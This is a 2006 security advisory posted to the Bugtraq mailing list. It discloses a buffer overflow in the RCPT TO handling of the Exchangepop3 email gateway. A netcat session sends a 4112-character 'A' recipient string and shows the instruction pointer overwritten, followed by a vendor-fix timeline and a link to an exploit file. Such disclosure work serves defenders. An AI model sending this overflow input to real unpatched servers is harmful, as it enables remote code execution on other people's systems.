From: <securma@morx.org.>
To: <bugtraq@securityfocus.com.>
Subject: Exchangepop3 rcpt buffer overflow vulnerability
Date: Fri, 3 Feb 2006 12:08:55 -0000
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - serveur7.heberjahiz.com
X-AntiAbuse: Original Domain - securityfocus.com
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - morx.org
X-Source:
X-Source-Args:
X-Source-Dir:
X-Virus-Scanned: antivirus-gw at tyumen.ru
Author: securma massine <securma@morx.org.>
MorX Security Research Team
http://www.morx.org
Product info :
EXchangepop3 is an email gateway (connector) that retrieves messages from
Internet POP3 email accounts and delivers them to Exchange Server.
Vulnerability Description:
eXchangepop3 is vulnerable to buffer overflow attack.
boundary errors in the handling of the RCPT TO (smtp) commands by sending a
large buffer, allow remote users to set a new Instruction Pointer to execute
arbitrary code and gain access on system.
C:\>nc 127.0.0.1 25
220 aaa ESMTP
mail [enter]
250 OK
rcpt to:<AAAAAA....("A"x4112)
we have :
eax=00000001 ebx=007334e0 ecx=41414141 edx=7c91eb94 esi=00455a38
edi=0f010001
eip=41414141 esp=0221f750 ebp=00000001 iopl=0 nv up ei pl nz ac po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010216
41414141 ?? ???
Affected Software(s):
Exchangepop3 v 5.0 (build 050203)
Affected platform(s):
Windows
Exploit/Proof of Concept:
http://www.morx.org/expl5.txt
Solution :
The vendor has released a new build fixing the problem :
The build number is 060125.
http://www.exchangepop3.com/
History:
14/01/2006 initial vendor contact
16/01/2006 vendor received details about the vulnerabilty
02/02/2006 vendor released the fixed build
Disclaimer:
this entire document is for eductional, testing and demonstrating purpose
only.
Greets:
Greets to undisputed and all MorX members.
